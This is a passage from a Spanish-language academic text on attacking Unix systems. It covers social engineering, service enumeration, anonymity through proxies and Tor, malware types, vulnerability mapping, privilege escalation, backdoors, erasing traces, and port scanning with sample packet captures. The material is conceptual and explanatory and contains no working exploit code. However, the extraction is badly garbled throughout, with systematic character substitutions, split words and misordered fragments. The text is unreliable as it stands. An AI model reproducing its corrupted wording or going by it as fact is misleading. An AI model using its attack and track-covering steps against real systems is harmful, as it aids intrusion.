;literal ente> de la organizaci8n# en busca de in/or aci8n Gtil. Muc$as e "resas no tienen un control sobre lo que se desec$a ' lo que no# ' "uede ser interesante "ara obtener docu entaci8n# disco r)gido roto o anticuado "uede contener "ara un ataque e9itoso.

edios

agnticos# etcH un

uc$)si a in/or aci8n Gtil

>ock picking 7%6<6=>?&<8% Fcnicas "ara abrir cerraduras# sin daBarlas ' sin "oseer la llave. 7nstalaci8n de <e1loggers "or $ardIare S47R7UR:?PT % 2n 6e'logger "or $ardIare es un dis"ositivo que se conecta al teclado# o al "uerto 2,B que registra en su disi ulado. e oria todo lo que el usuario tecle8# estando escondido o

S oulder Surfing 7%6<6=SSF8 % Alguien entrenado a $us ear las contraseBas de los de s ientras las ti"ean. Pigg1backing 7%6<6=P6@8 % Consiste en $acerse "asar "or alguien autorizado "ara sortear un "uesto de seguridad# co o "uede ser la entrada a un edi/icio.

-.-.2. Acceso <e oto. Enu eraci8n de ,ervicios.


:a a'or)a de las $erra ientas e in/or aci8n dis"onibles se re/ieren a ste ti"o de anlisis% c8 o buscar vulnerabilidades a un deter inado siste a en /or a re ota. En este caso# el atacante co ienza a utilizar $erra ientas de escaneo2- de "uertos '&o servicios# redes ' $osts dis"onibles# 'a que de esa alcanzables%
2- escaneo% se le deno ina as) en la jerga# ' "roviene de una castellanizaci8n del verbo en ingls scanningH en es"aBol signi/ica CrastreoD. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2- de 22O

anera intenta

recabar in/or aci8n sobre qu caracter)sticas es"ec)/icas tienen los objetivos

Ca")tulo -. ( -.-.BGsqueda ' rastreo de vulnerabilidades.

Aistemas de 1onitoreo ! de 2iltrado de tr=ico % 75,s# 7!,s# FireIalls# <outers# ,Iitc$es# etc. Aistemas 0perativos% 2ni9 ;,olaris# B,5s# etc.># :inu9# @ovell# Mac ?, A# 4indoIs# etc. ' sus versiones en "articular. AervidoresGAervicios% FF!# 4eb# Mail# 5@,# Fer inales# L!@# etc.H qu so/tIare ejecutan "ara i "le entar dic$o servicio ' en qu versiones# tanto del "rotocolo del servicio co o del so/tIare. Aplicaciones%

A"licaciones 4eb% CM,s ;Content Manage ent ,'ste s># Frac6ing# A"licaciones que ,"a ' Anti(Lirus.

7ssue

anejan el correo entrante ' saliente% ,o/tIare Anti(

A"licaciones co erciales% ,iste as de Pesti8n# E<!&C<M. A"licaciones de co unicaci8n% Mensajer)a instantnea# 7<C. Foda a"licaci8n que utilice la red ' est brindando un servicio a travs de ella.

,i la objetivo# el

eta del atacante en esta eta"a es tener una Cradiogra/)aD del siste a edio "ara generarla es realizar una detecci8n de los "uertos

abiertos21 en "ri era instancia# ' luego deter inar la versi8n es"ec)/ica ;o al enos a"ro9i ada> del so/tIare que est detrs# en lo que se conoce co o enumeraci-n. Co o "uede deducirse al ver el listado# as) co o la cantidad de "osibilidades es real ente enor e# existe una cantidad i)ual de )rande de pro)ramas desarrollados en pos de o(tener in=ormaci-n remota H con el tie "o# un crac6er e9"eri entado "uede $acerse de un Ctool6itD25 i "ortante ' diverso de so/tIare "ara obtener in/or aci8n ' veri/icar debilidades en los siste as. AGn as)# se "uede considerar a Nmap co o el s utilizado 'a que es el

21 2n puerto ;en el "rotocolo FC!> es un nG ero que re"resenta una cone9i8n con la ca"a de red 7! del ,iste a ?"erativo. !uede tener varios estados# ' el estado CabiertoD signi/ica que $a' un "rogra a asociado al is o que est escuc$ando "or "eticiones de otros "rogra as en la red# usual ente "ara devolverle algGn resultado 25 Fool6it% Conjunto o CCajaD de $erra ientas. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 21 de 22O

Ca")tulo -. ( -.-.BGsqueda ' rastreo de vulnerabilidades.

s verstil ' "oderoso# "ero e9isten ="ing ' ,ca"'# @essus# Core 7 "act# 7 ca"acidades di/erentes. Es

uc$os otros generales ta bin co o

s otros con /ines es"ec)/icos co o 7ngu a# @i6to# Metas"loit# unit' Canvas# etc.# cada uno con objetivos ' s# la red est "oblada de estas $erra ientas# '

cualquier $ac6er "odr)a desarrollar una que obtenga in/or aci8n a "artir de alguna vulnerabilidad nueva# "ublicada o conocida. 7ncluso algunos co binan estas tcnicas de rastreo con una base de datos de vulnerabilidades ' $asta la anera de e9"lotarlas ;e9"loits>. :a idea es "resentarle anera# con al ad inistrador una suite co "leta de penetration testingAB. 5e esa

una Gnica $erra ienta# un tcnico "uede rastrear uno o varios siste as de la e "resa# ' sta# con una inter/az gr/ica a igable# ejecuta los siguientes "asos% *. Mediante so/tIare de rastreo e identi/icaci8n# realiza las averiguaciones de la e9istencia o no ' versi8n de los di/erentes co "onentes de so/tIare que se estn ejecutando en el objetivo. 2. Co "ara los resultados con su base de datos de /ir as2+. -. Muestra un in/or e con las vulnerabilidades detectadas# la gravedad que re"resentan# ' c8 o se "uede re ediar o al enos itigar. 1. !er ite ejecutar e9"loits relacionados# con el /in de co "robar si real ente e9iste la vulnerabilidad ' qu consecuencias conlleva. 5. <ealiza una li "ieza de todo lo $ec$o. Co o "uede verse# realizan todos los "asos t)"icos de un test de "enetraci8n )ntegro. Estas $erra ientas tienen uc$)si a utilidad "ara los ad inistradores de siste as ' redes grandes# 'a que entre sus ventajas se cuentan% <educir la co "lejidad de una auditor)a. !er itir realizar un anlisis Cquic6 and dirt'D 2O del estado general en

2J Ler Plosario% !enetration Festing# "g. 2**. 2+ /ir a% una /ir a ;ta bin deno inado C fingerprintD# o C$uella digitalD> es una secuencia de b'tes que identi/ican un)voca ente algoH en el conte9to se re/iere a una /ir a del conjunto de "rogra as que se estn ejecutando en el o los siste as re otos. 2O Cquic6 and dirt'D% <"ido ' sucio. Es una /rase de la jerga que signi/ica resolver un "roble a en /or a r"ida "ero sin eli inar en /or a co "leta el general ente es un "roceso s co "lejo ' largo>. otivo que lo caus8 ;lo cual

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 25 de 22O

Ca")tulo -. ( -.-.BGsqueda ' rastreo de vulnerabilidades.

cuanto a seguridad de la organizaci8n.


@o se necesitan e9"ertos "ara realizarlo. Es s barato ' re"roducible las veces que se necesiten# que contratar a un equi"o e9terno ;o interno> de "enetration testers una Gnica vez. ,in e bargo su objetivo s8lo es $acer un test de "enetraci8n de /or a

si "le# ' ade s de ser onerosas ;algunas># s8lo conte "lan un conjunto sie "re reducido de ca"acidades# 'a que las base de datos de e9"loits son desarrolladas ' ad inistradas "or el "roveedor del so/tIare. Ade s# dada su naturaleza# es s8lo un e9a en de seguridad a nivel de so/tIare# ientras que no tienen en cuenta las $abilidades del atacante "ara e9"lotar la ingenier)a social# utilizar e9"loits que no $a'an sido $ec$os "Gblicos# arreglados# desarrollados o conocidos aGn# a"rovec$ar de/iciencias en la o"eratoria de la organizaci8n# e in/inidad de CagujerosD "or donde el intruso "uede atacar. Es decir# es una $erra ienta de =uncional de los crac:ers. uc$a a'uda# "ero no es >el? reempla3o

-.1. Buscando el Anoni ato en la red


A edida que el atacante e9"lora las redes del objetivo en cuesti8n# $a' que u' "robable que dic$a co unicaci8n quede registrada "ensar ta bin en que es que es /in. Ka que es i "ortante "ara el intruso no dejar rastros# o al esta tarea# $a' uc$as /or as "or las cuales se "uede lograr. enos# di/icultar

en uno o varios lugares% "roveedores de internet# routers ' redes inter edias# ' lo s i "ortante% logs20# siste as de identi/icaci8n de intrusos ;75,s> ' onitoreo en el siste a objetivo is o o en equi"os destinados a tal siste as de

-.1.*. <edes ' ,iste as An8ni os


:os siste as an8ni os son la anera s sencilla de Cdes"erdigarD el rastro del origen del ataque. E9isten innu erables equi"os en internet listos "ara ser utilizados co o prox1-.# tanto de "rotocolos Ieb co o de "rotocolos FC!# garantizando anoni ato co "letoH es "osible ta bin CencadenarD varios nodos
20 Ler Plosario% :og# "g. 2*.. -. Ler Plosario% !ro9'# "g. 2**. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2J de 22O

Ca")tulo -. ( -.1.Buscando el Anoni ato en la red

Can8ni osD antes de alcanzar el objetivo# aunque esto re"ercuta en la de ora del env)o ' rece"ci8n de los ensajes. Fa bin es "osible utilizar una red de "ro9's ;en /or a de gra/o no dirigido> que realizan su co unicaci8n en /or a encri"tada ' variando los CsaltosD que recorre el tr/ico "or cone9i8n% Tor-*. ?tra "osibilidad es utilizar lugares "Gblicos de acceso a internet# cone9iones de terceros# etc. :as "osibilidades son a "lias# conocidas ' de"endiendo del nivel de anoni ato# co "lejidad ' velocidad# el intruso ;o varias> de ellas. u' "robable ente elegir alguna

-.1.2. 2tilizaci8n de MalIare


?tra tcnica de anoni ato consiste en utilizar so/tIare escrito con /ines aliciosos ;C alIareD># "revia ente instalado en equi"os ajenos# "ara controlarlos re ota ente ' realizar actividades "osteriores# $acindose "asar "or ellos. 5entro del vasto estos%

undo del

alIare# un atacante "uede utilizar alguno de

Birus S47R7UL7<2,T: 2n virus es un "rogra a escrito con la /inalidad de ser instalado inadvertida ente "or el usuario de un siste a# "asando desa"ercibido durante todo su ciclo de vida# ' que "uede re"roducirse a s) is o en otros nodos la a'or cantidad de veces que "ueda# tal co o los ientras reside en el equi"o de"ende de su virus biol8gicos. Vu $ace

"rogra aci8n# "ero suele "oseer el control co "leto del equi"oH "udiendo eli inar arc$ivos# establecer contacto con la red# etc. 2n virus "uede ser utilizado -2 "or un crac6er "ara dirigir desde los nodos a/ectados un ataque a un objetivo en "articular# en un deter inado o ento.

Horms S47R7U4?<MT: 2n Ior

o gusano es

u' si ilar a un virus todos de

;t)"ica ente es con/undido con uno de ellos cuando de usuarios no es"ecializados se trata># con la salvedad de que sus
-* For% F$e ?nion <outer. 2<:% $tt"%&&III.tor"roject.org -2 El c8digo /uente de los virus suele conocerse o di/undirse "ri era ente en sitios rec8nditos de internet# en redes Cde con/ianzaD# redes de crac6ers# salas de c$at# etc. Esto /acilita la odi/icaci8n ' "ro"agaci8n de los ejecutables antes que las e "resas /abricantes de antivirus "uedan reaccionar. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2+ de 22O

Ca")tulo -. ( -.1.Buscando el Anoni ato en la red

"ro"agaci8n son di/erentes. :os Ior s utilizan vulnerabilidades re otas de seguridad conocidas de siste as o"erativos# servicios ;4eb# Base de 5atos# Mail# Ft"># etc. "ara to ar el control de un $ost ;equi"o> conectado a la red. ,i bien se "uede su"oner que al ser vulnerabilidades conocidas ;' con cierta antig^edad> su )ndice de 9ito ser bajo# en realidad general ente tienen bastante 9ito# ' re otas graves ' de so/tIare uc$os "roble as a 2n Ior uso intensivo de recursos% C!2# "uede ser creado o s si se trata de vulnerabilidades u' utilizado. 2sual ente agota o $ace un e oria# disco# red# etc. ' esto causa odi/icado "ara to ar el control de

edida que se e9tiende.

cualquier objetivo conectado a la red# con el "ro"8sito de que se una a una botnet ;ver debajo> o que sirvan de nodo inter edio "ara ser controlados re ota ente instalando "uertas traseras ;ver "g. -*> o root6its ;ver abajo># ' "osterior ente realizar ataques u obtener in/or aci8n del objetivo. Cuando un nodo es conquistado ' se lo antiene bajo control "ara "osteriores actividades# se lo deno ina C3om(ieD S47R7UQ?MB7ET.

Root:its S47R7U<R7FT: 2n root6it es un ti"o de "rogra as que co o gru"o son diseBados "ara vulnerar ' ca u/larse en el siste a objetivo# dis"oniendo del control total del equi"o ' de las utilidades de odi/icando el co "orta iento onitoreo# ad inistraci8n ' seguridad del siste a

o"erativo "ara evitar ser detectados. !uede ser instalado "or un tro'ano ;ver "g. 2*># un Ior # ser ejecutado "or el usuario inducido "or el atacante v)a ingenier)a social# etc. En la a'or)a de los casos# instalan una "uerta trasera "ara que el atacante acceda sin "roble as en /or a re ota. Con alguna o varias de estas $erra ientas es "osible que el atacante utilice los equi"os bajo su control ;sus Czo biesD> directa ente $acia el objetivo# o ta bin "uede organizar una red de ellos# es"erando conjunta ente "or sus 8rdenes# lo que se deno ina una &otnet S47R7UB@EFT.

-.5. Ataque e 7ntrusi8n


-.5.*. Ma"eo de Lulnerabilidades
A esta altura# luego de la eta"a de enu eraci8n# el atacante tiene un a"a

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2O de 22O

Ca")tulo -. ( -.5.Ataque e 7ntrusi8n

con

a'or o

enor "recisi8n de lo siguiente%

Estructura de las <edes ' "untos de entrada&salida "Gblicos '&o "rivados. Vu servicios se brindan en cada uno ' "ara quin. Vu so/tIare ' dis"ositivos se ejecutan en cada nivel de la "ila FC!&7!. :a gente que lo ad inistra# in/or aci8n "ersonal. Con toda esta in/or aci8n# obtenida a lo largo del "er)odo de investigaci8n# s un "er/il tcnico o social ' quizs algo de

quizs 'a sea "osible crear una lista de vulnerabilidades "otenciales "or las cuales el atacante "odr vencer a las l)neas de de/ensa del objetivo. 5ic$a lista es el "roducto del anlisis conocido co o mapeo de vulnera(ilidades--. :o ideal es "riorizar dic$a lista# identi/icando la di/icultad in$erente de cada agujero detectado o que se sos"ec$a que e9iste. Fa bin# si se investig8 una red o varios $osts# se "uede "riorizar "or equi"o% "or eje "lo# los siste as que se encuentran en eta"a de "ruebas ;Ctest.e "resa.co D># o con s vulnerables ' general ente uc$os servicios abiertos# sern enos vigilados que los que estn en "roducci8n#

"or lo que son "re/eribles "ara co enzar el ataque. Ade s es a"licable una veri/icaci8n de no estar atacando algGn $one'"ot -1. Es decir# a"licar el sentido co Gn en el ordena iento de los objetivos es "ri ordial en esta "arte del "roceso. 2na buena de/inici8n ;S=ACRUEA!T# ca". 5> de quizs# la eta"a i "ortante antes de atacar el objetivo es% CEl s a"eo de vulnerabilidades es el

"roceso de relacionar atributos es"ec)/icos de seguridad de un siste a a una vulnerabilidad asociada o "otencial. Esta es una /ase cr)tica en la e9"lotaci8n de un siste a objetivo que no deber)a ser "asada "or alto.D Co o a'uda# el atacante "uede recurrir a bases de datos "Gblicas de

-- :a "alabra C a"eoD es una castellanizaci8n del ingls C a"D# que signi/ica trazar en un ,e utiliza -1 Ler Plosario% =one'"ot# "g. 2**.

a"a.

uc$o "ara $acer re/erencia a la traza de "untos# ideas# relacionar una cosa con otra.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 20 de 22O

Ca")tulo -. ( -.5.Ataque e 7ntrusi8n

vulnerabilidades% la lista de correo Bugtraq-5# el CE<F-J# CLE-+# ,ecunia-O# directa ente de los /abricantes del so/tIare que o"era el objetivo# ' varias listas de seguridad dis"ersas "or 7nternet. Fa bin e9isten sitios donde se consiguen ;o aneras de co "rar-0> e9"loits# $erra ientas# in/or aci8n no docu entada ni "Gblica# etc. que "ueden ser Gtiles "ara introducirse en el siste a objetivo. ?tra o"ci8n es el uso de $erra ientas de "enetration testing co o las que se vieron en la "gina 25# aunque libres de uso# co o @essus o Metas"loit# ' con "osibilidades de e9tenderlas ediante "rogra as "ro"ios ;dic$as $erra ientas "oseen ca"acidad de ser e9tendidas ' "ersonalizadas>.

-.5.2. E9"lotaci8n e intrusi8n


AGn a "esar de todo el anlisis "revio ' "re"araci8n que "ueda tener# en un ataque es di=6cil tener xito. Es un "roceso donde la "aciencia "one a "rueba al atacante% bsica ente# consiste en recorrer la lista elaborada en la eta"a de $acerlo. !robable ente se consiga acceso co o usuario sin "rivilegios# en donde si bien se consigue la in/or aci8n ' "rocesos que dis"onga o aneje ese usuario# no se obtiene control total del equi"oH en ese caso# "ara obtener derec$os de ad inistrador ;el usuario root en la /a ilia de siste as 2ni9># se realiza lo que se lla a una escalada de privile)ios# que ta bin "uede a"rovec$ar errores de con/iguraci8n# agujeros de seguridad# claves /ciles de desci/rar# etc. del siste a objetivo. !ara desarrollar ' utilizar todas estas tcnicas# tcnica ente es i "rescindible "oseer conoci ientos de "rogra aci8n en bajo nivel# de uno o varios ,?s# "rotocolos varios ' algunas virtudes e9tra% sentido co Gn# $abilidad#
-5 :a lista Bugtraq es "arte del sitio ,ecurit' Focus. 2<:% $tt"%&&III.securit'/ocus.co & -J CE<F% El CE<F es un "ro'ecto llevado adelante "or la 2niversidad Carnegie Mellon. 2<:% $tt"%&&III.cert.org -+ CLE% Co on Lulnerabilities and E9"osures# es una base de datos de vulnerabilidades u' "o"ular /inanciada "or el 5e"to. de ,eguridad de los Estados 2nidos. -O ,ecunia% Es un servicio de in/or aci8n sobre seguridad in/or tica dans. 2<:% $tt"%&&secunia.co & -0 Actual ente# e9iste un ercado de co "ra(venta de e9"loits ' vulnerabilidades cada vez s grande# que crece en /or a e9"onencial de un aBo a otro. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -. de 22O

a"eo

de vulnerabilidades# conseguir las $erra ientas necesarias "ara llevarlo a cabo '

Ca")tulo -. ( -.5.Ataque e 7ntrusi8n

inteligencia ' sobre todo# "erseverancia.

-.J. !uertas traseras ' Eli inaci8n de $uellas


2na vez obtenido el control "retendido "or el atacante# ste tiene varios ca inos a to arH una o"ci8n ser)a "ara averiguar qu in/or aci8n antener el control evitando ser detectado# ecanis o "or el cual el atacante aneja el siste a# la red# los usuarios# etc.

2na "uerta trasera ;C&ac: DoorD> es un

asegura el control "osterior ' a voluntad del siste a co "ro etido. Peneral ente es un so/tIare que est a la es"era de cierta actividad re ota# "or eje "lo# enviando una co binaci8n o secuencia de "aquetes con cierto contenido ;C Ain)le 4ac:et Aut9enticationD># o el caso es"ecial ente a una co binaci8n de algunos casos. ?tra alternativa# si es que 'a se obtuvo todo lo que se deseaba# ser)a eli inar todo rastro del ataque% li "iar $istoriales de co andos# arc$ivos te "orales# restableci iento de algGn servicio a/ectado# "er isos de arc$ivos# etc. s t)"ico% una ter inal que res"onde usuario&contraseBa# s8lo "or no brar

-.+. Atacar otro siste a


?tra alternativa del atacante# una vez que se tiene el control del objetivo# o al enos acceso re oto# es instalar so/tIare "ara atacar local ente a otro u' "robable ente de su real inters. Algunas de las "osibilidades que anera "asa desa"ercibido si es un siste a#

tiene el atacante son%

7nstalar un rootkit ;ver "g. 2O>% de esa $ost que se utiliza o descubierto.

onitorea en /or a regular# donde el ataque "uede ser

7ns"eccionar ' analizar los arc$ivos ' "rocesos a los cuales se tiene acceso# en busca de in/or aci8n "ara avanzar al "r89i o salto. Modi/icar arc$ivos# utilizar de alguna engaBar a un usuario. anera ingenier)a social "ara

7nstalar un sniffer# en busca del tr/ico de la red a la cual est conectado. Es u' co Gn "oder detectar contraseBas en te9to claro# que estn siendo interca biados "or "rotocolos no encri"tados ;=FF!# FF!# ,MF!#

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -* de 22O

Ca")tulo -. ( -.+.Atacar otro siste a

"rotocolos "lanos sin F:,1.&,,:1*# etc.>H las redes con utadas ;unidas "or sIitc$es> no son un "roble a si se utilizan tcnicas de A<! 12 ,"oo/ing1- o si ilares.

7nstalar so/tIare que se a"rovec$e del uso del equi"o# co o "or eje "lo un ke1logger "or so/tIare. Evidente ente# el grado de 9ito de la "er anencia en el objetivo estar

dado "or la relevancia del siste a co "ro etido ' las

edidas que se estn

i "le entando en la organizaci8n "ara aislarse de los ataques en cuanto a todos de control# con/idencialidad ' autenticaci8n de seguridad a los distintos equi"os ' dis"ositivos de red.

1. Ler Plosario% F:,# "g.# 2*2. 1* Ler Plosario% ,,:# "g. 2*2. 12 Ler Plosario% A<!# "g. 2*.. 1- ,"oo/ing% C!arodiaD en castellano. C,"oo/ingD trata de un conjunto de tcnicas "ara /alsi/icar ' $acer "asar un ele ento invlido o no autorizado "or otro que s) lo est. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -2 de 22O

Ca")tulo 1. ( Ca")tulo 1. !ort ,canning

/ap6tulo <. 4ort Acannin)


5entro de las tcnicas de o(tenci-n activa de in=ormaci-n de una red objetivo# "revio a e/ectuar el ataque# sta se realiza con varias $erra ientas distintas. En "ri era instancia# la CagujerosD "or d8nde ingresar. s i "ortante quizs sea el "ort scanner# un so/tIare que brinda datos su/icientes al atacante co o "ara e "ezar a encontrar

1.*. Mtodo de Funciona iento ' ?bjetivos


El /unciona iento de los "ort scanners se basa en enviar uno o varios "aquetes "or la red ;lla ados probes, co o las "ruebas de laboratorio># ' luego aguardar "or los resultados. !uede suceder que se reciba una res"uesta# del objetivo o de algGn $ost inter edio ;un router&/ireIall que aneje tr/ico entre el origen ' el destino># o que no se reciba ninguna. Cada caso tiene un signi/icado# de"endiendo del ti"o de scanning que se $a'a utilizado ' de la res"uesta en s). !or otra "arte# ta bin tiene que ver el "rotocolo a utilizarH en el stac6 FC!&7!v1 ;el s e9tendido en la actualidad># los "rotocolos que intervienen en odelo ?,7 SC,C?U7@EFBA,T>% 7CM!11# odelo# que es 7! 1+. Cabe estas "ruebas son aquellos de ca"a 1 ;del

FC!15 ' 25!1J# "or enci a de la ca"a - de dic$o

aclarar que si bien el "rotocolo 7CM! interviene en los escaneos 'a que brinda in/or aci8n en ciertos casos# los tipos de port scannin) son dos: T/4 o UD4 ;no e9isten los C"uertos 7CM!DH "or eje "lo# cuando se $abla de un "uerto CabiertoD en el esque a FC!&7!# necesaria ente es FC! o 25!>. :a idea es plenamente ;la ani"ular ;o a veces no> los "aquetes a enviar# no respetando a'or)a de los casos> los "rotocolos establecidos "or el 7EFF 1O. El

objetivo "or lo general es%


Aer rpido. 2n escaneo "uede to ar $oras ' $asta d)as en una red 4A@. Aer preciso. !ara evitar los /alsos "ositivos ' detectar "uertos real ente

11 7CM!% 7nternet Control Message !rotocol ;!rotocolo de Mensajes de Control de 7nternet>. ,i bien no es "rotocolo de Ca"a 1 "or de/inici8n 'a que no trans"orta in/or aci8n de los usuarios# de"ende ' es enca"sulado "or un "aquete 7! "ara /uncionar. Ler SFC!&7!U7llT# Ca". J. 15 FC!% Frans ission Control !rotocol ;!rotocolo de Control de Frans isi8n>. Ler SFC!&7!U7llT# Ca"s. *+ al 21. 1J 25!% 2ser 5atagra **. 1+ 7!% 7nternet !rotocol ;!rotocolo de 7nternet>. Ler SFC!&7!U7llT# Ca". -. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -- de 22O !rotocol ;!rotocolo de 5atagra a del 2suario>. Ler SFC!&7!U7llT# Ca".

Ca")tulo 1. ( 1.*.Mtodo de Funciona iento ' ?bjetivos

abiertos.

!asar lo

s desaperci(ido ;stealt > "osible "ara evitar la detecci8n de

los ad inistradores del sitio objetivo. FC!# al i "le entar =ia(ilidad en la co unicaci8n de la carga ;ta bin lla ado pa1load># debe anejar di/erentes estados de cone9i8n# tanto en el a'or)a de los servicios se trans isor co o en el rece"tor ;a bos 'a que nor al ente las cone9iones FC! son bidireccionales>. Este $ec$o# ' su ado a que la >interesante? para el atacante# con i "le entan sobre FC!# $ace que el escaneo de puertos T/4 sea ms a'or "otencial "ara a"rovec$ar vulnerabilidades ' de/iciencias en la in/raestructura.

1.2. Estados de un !uerto


5esde el "unto de vista de la "ersona que est buscando activa ente in/or aci8n de una red e9terna# un "uerto FC! o 25! "uede estar en alguno ;o varios a la vez# co o 'a se ver> de los siguientes estados%

1.2.*. !uerto Abierto ;C?"en !ortD>


2n "uerto se encuentra abierto cuando el destino10 res"onde e9itosa ente al test. El "ort scanner "uede detectar que e/ectiva ente $a' un servicio es"erando "or cone9iones ;FC!> o datagra as ;25!> en el "uerto sobre el cual se $ace la "rueba.

1O 7EFF% 6nternet 3ngineering -ask Force N Pru"o de Frabajo en 7ngenier)a de 7nternet. Es la organizaci8n que actual ente ;' desde que /ue creada en *0OJ> regula los "rotocolos tcnicos ' desarrolla los estndares a lo largo ' anc$o de la 7nternet. 5ic$os estndares se "ublican co o docu entos lla ados <FC ;:e#uest for &omments N !edido de Co entarios>. Ler $tt"%&&III.iet/.org& ' $tt"%&&tools.iet/.org&$t l& "ara la base de datos de <FCs. 10 En estos casos# se $abla del CdestinoD co o un todo cuando en realidad# lo que recibe ' contesta o no dic$o a test es un "rogra a o servicio que est escuc$ando en el "uerto en el que se est realizando la "rueba. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -1 de 22O

Ca")tulo 1. ( 1.2.Estados de un !uerto


Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.0011)7 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.0356+0 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: + Tiempo: 0.036((+ Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 5 Tiempo: 0.036(+3 Origen: 19(.16).0.(:5)071 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5)071 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: 6 Tiempo: 0.039((0 Origen: 19(.16).0.30:(( -> De tino: 19(.16).0.(:5)071 Proto!o"o: T,P De !rip!i%n: (( > 5)071 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 7 Tiempo: 0.039(66 Origen: 19(.16).0.(:5)071 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5)071 > (( -$.T0 .eq11 2en10

Ca"tura *% Eje "lo de !uerto FC! 22 abierto en el $ost *02.*JO...-.

Co o se "uede ver# en la Ca"tura * de Fr/ico de <ed ;que ocurre a bajo nivel> sucede lo siguiente%

uestra lo que

7. 4aquetes 7.<: :uego de 2 A<! <equest ;que "er iten averiguar la direcci8n MAC dada una 7!# "aso "revio ' necesario al env)o de tra as al objetivo> se obtiene la res"uesta A<! desde el $ost destino. +. 4aquetes .": El "ort scanner# desde el "uerto origen FC! 5O.+*# env)a al "uerto FC! 22 del objetivo un "aquete con el flag ,K@5. activado# seBal de inicio de una cone9i8n. Co o dic9o puerto est asociado a un
5. :os flags# o en castellano# CbanderasD# son bits deter inados en el encabezado de los "aquetes FC! ;Ca"a 1>. :os bits que "ueden ser utilizados son% 2<P# ACR# !,=# <,F# ,K@ ' F7@. Ler Ane9o A. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -5 de 22O

Ca")tulo 1. ( 1.2.Estados de un !uerto

servicio 7# el ,iste a ?"erativo destino res"onde con un ,K@_ACR52. :uego el "aquete llega al origenH no $a' dudas# al recibir el ,K@_ACR desde el "uerto 22# el "ort scanner est seguro de que algGn servicio est escuc$ando all)# "or lo que se ter ina la "rueba# esta(leciendo que el puerto ++ del o(jetivo est a(ierto . !or Glti o# se env)a un nuevo "aquete con el flag <,F ;de CresetD> "ara i "edir el estableci iento co "leto de la cone9i8n. As) la "rueba trata de "asar desa"ercibida 5- "ara el $ost destino.

1.2.2. !uerto Cerrado ;CClosed !ortD>


El "uerto est cerrado cuando co o res"uesta se recibe un "aquete con el /lag de reset ;<,F> en el caso de FC!# ' un 7CM! ti"o -&c8digo - ;C (estination Unreac ableCPort Unreac ableD ( 5estino 7nalcanzable&!uerto 7nalcanzable> en el caso de un test 25!.
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.035)+9 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.0696(6 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: + Tiempo: 0.069991 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6

5* Cuando se $abla de un servicio# la re/erencia es $acia un "rogra a# so/tIare# agente o co Gn ente Cde onioD ;CdaemonD> en los ,iste as ?"erativos ti"o 2ni9. 52 @o olvidar la secuencia de un t)"ico t$ree(Ia' $ands$a6e FC!% ,'n ,'n_Ac6 Ac6.

5- El escaneo que se realiz8 en este caso /ue de ti"o C Stealt D# esto e9"lica el <,F "ara no establecer co "leta ente la cone9i8n. Ler s adelante en este ca")tulo los ti"os de escaneo.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. -J de 22O

Ca")tulo 1. ( 1.2.Estados de un !uerto


Paquete Nro: 5 Tiempo: 0.07000) Origen: 19(.16).0.(:61609 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 61609 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: 6 Tiempo: 0.070331 Origen: 19(.16).0.30:)0 -> De tino: 19(.16).0.(:61609 Proto!o"o: T,P De !rip!i%n: )0 > 61609 -$.T4 #,50 .eq10 #!611 &in10 2en10

Ca"tura 2% !uerto FC! O. cerrado en el $ost *02.*JO...-.

